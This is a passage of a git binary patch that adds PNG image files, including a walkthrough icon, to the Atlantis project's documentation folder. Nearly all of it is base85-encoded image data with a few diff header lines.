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

    }TqjNCYelLie=+&fBKi{RRHEaV$Eom;nF0Kxttc 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 literal 0 HcmV?d00001 diff --git a/runatlantis.io/docs/images/atlantis-walkthrough-icon.png b/runatlantis.io/docs/images/atlantis-walkthrough-icon.png new file mode 100644 index 0000000000000000000000000000000000000000..915c6a15875becebd8e1103118aa7099940a2824 GIT binary patch literal 79344 zcmZU(Wl$Yavo4IgySoK(wrA00|ti2Z6hwOA}cOV zrsC>kX=85z2Bs5{?gP)OxxM@){JhbBXm~F;eJ_Zbef;e{YpZ;u-v&s*))e2~+029fpg8cV4db1O!%J$+qt}R|kb%JZRwGViqQb)+ z_I#k?{Jx@yzrHNz-|7@GM!#6LNXE4a*^4A1VN;(zNXz$wSjhWlgI>`jNW?_KvpI5#LcI`7{KUu#Mv7pSlKh_ zmQKiMKely}v3@V&%t~LDNMs9q{@p@1dFs6^HWdr=()(y}L+th;L_hk?fp`q(oeD2favpr`7Ir^KcUAfQuVLy@+z& zd55v0!Ot9ieI%whuWgxg_?|6616L=O==~%qbpjRB?wx(o&Pw+wgYkvgOJPT#&~%*)MHy<6^nEOSH#HGet`-2je8U_pAH-!X-ej3Tc4iJe(C5O}}?Ur;uX zp8H#QZntH;8?oVod>gm-aKcv#-)EESG78d-K1jP$1398s?s%f_;^Wrz(IQQD-zexl z!ByX1M-nc^ok-*|(vP&$v{fLD-Ga8agnQPVF4xiQz5wiFa9~x)(asm7*#L}rrg^ZP z+Rx;e1v2u)i-PCdgOlhi2YlcA2=Ikq6kU9xU|cwG7juPJ5o~L4A!8)QU}R?~M`Kj> zb8s>!6JkUR5rh%2RWjUM7|>6=v=I59IGmw0GYI@5sNQh-!R5vfG4c2}=o4Y2#?YZ; 